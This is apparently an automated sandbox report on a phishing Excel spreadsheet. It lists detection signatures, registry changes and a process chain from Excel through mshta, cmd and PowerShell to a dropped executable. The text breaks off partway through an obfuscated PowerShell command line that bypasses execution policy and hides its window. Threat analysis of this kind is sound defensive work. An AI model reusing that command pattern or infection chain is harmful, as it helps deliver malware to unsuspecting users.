Malware Analysis Report

2025-01-18 23:25

Sample ID 240627-bjerssvalf
Target 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls
SHA256 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64
Tags
phishing
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64

Threat Level: Known bad

The file 265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls was found to be: Known bad.

Malicious Activity Summary

phishing

Process spawned unexpected child process

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Detected phishing page

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: AddClipboardFormatListener

Suspicious use of AdjustPrivilegeToken

Uses Volume Shadow Copy WMI provider

Uses Task Scheduler COM API

Suspicious use of SetWindowsHookEx

Modifies Internet Explorer settings

Modifies registry class

Enumerates system info in registry

Checks processor information in registry

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-27 01:10

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-27 01:10

Reported

2024-06-27 01:12

Platform

win7-20240221-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\igccu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Detected phishing page

phishing

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597} C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\ = "&Edit" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\igccu.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2588 wrote to memory of 1728 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 1728 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 1728 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2588 wrote to memory of 1728 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1728 wrote to memory of 2428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1728 wrote to memory of 2428 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2428 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2428 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2428 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2428 wrote to memory of 1932 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1932 wrote to memory of 1784 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1784 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1784 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1932 wrote to memory of 1784 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2428 wrote to memory of 1808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2428 wrote to memory of 1808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2428 wrote to memory of 1808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe
PID 2428 wrote to memory of 1808 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\igccu.exe

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\265e091ffeb34fdc48b53f433c7434f230891cb8b82f758cd570c8b070ae0c64.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowErShelL -EX BYpAss -nOp -W 1 -c DEviCEcrEdentIALDEpLoYment ; 